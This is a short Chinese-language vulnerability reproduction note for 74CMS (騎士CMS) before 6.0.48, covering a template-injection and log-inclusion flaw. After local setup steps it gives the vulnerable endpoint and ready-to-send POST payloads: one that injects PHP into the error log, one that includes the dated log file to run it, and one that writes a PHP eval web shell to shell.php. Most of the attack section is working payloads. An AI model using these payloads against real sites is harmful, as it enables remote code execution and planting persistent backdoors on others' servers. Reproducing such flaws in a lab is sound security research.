1、坑
payload:variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企業id="$_GET['id']"/>
涉及中文,用burp搞了很長時間,還是不能復現,最后看到timeline的文章,使用hackbar發送post包,成功復現
2、影響版本
騎士CMS<6.0.48
3、復現流程
1、常規的就不說了,下載地址https://www.74cms.com/download/index.html,注意下載6.0版本的
2、扔phpstudy根目錄下搭建,注意php版本建議使用5.3,不支持5.3以下,php7.0安裝時第二步無法跳到第三步
3、搭建成功后,進入http://127.0.0.1/74cms/upload/install.php進行安裝
4、安裝完成后進入首頁
5、payload:
index.php?m=home&a=assign_resume_tpl
POST:variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企業id="$_GET['id']"/>
使用hackbar發送數據包
此時安裝目錄日志內已有相關錯誤日志
再次發送post包:variable=1&tpl=data/Runtime/Logs/Home/當天年月日.log
漏洞復現成功
寫入一句話payload:
variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企業id="$_GET['id']"/>
四、參考鏈接
https://mp.weixin.qq.com/s/4-36O4OaWxu2jX2pzb5_Wg
https://www.cnblogs.com/twlr/p/14142870.html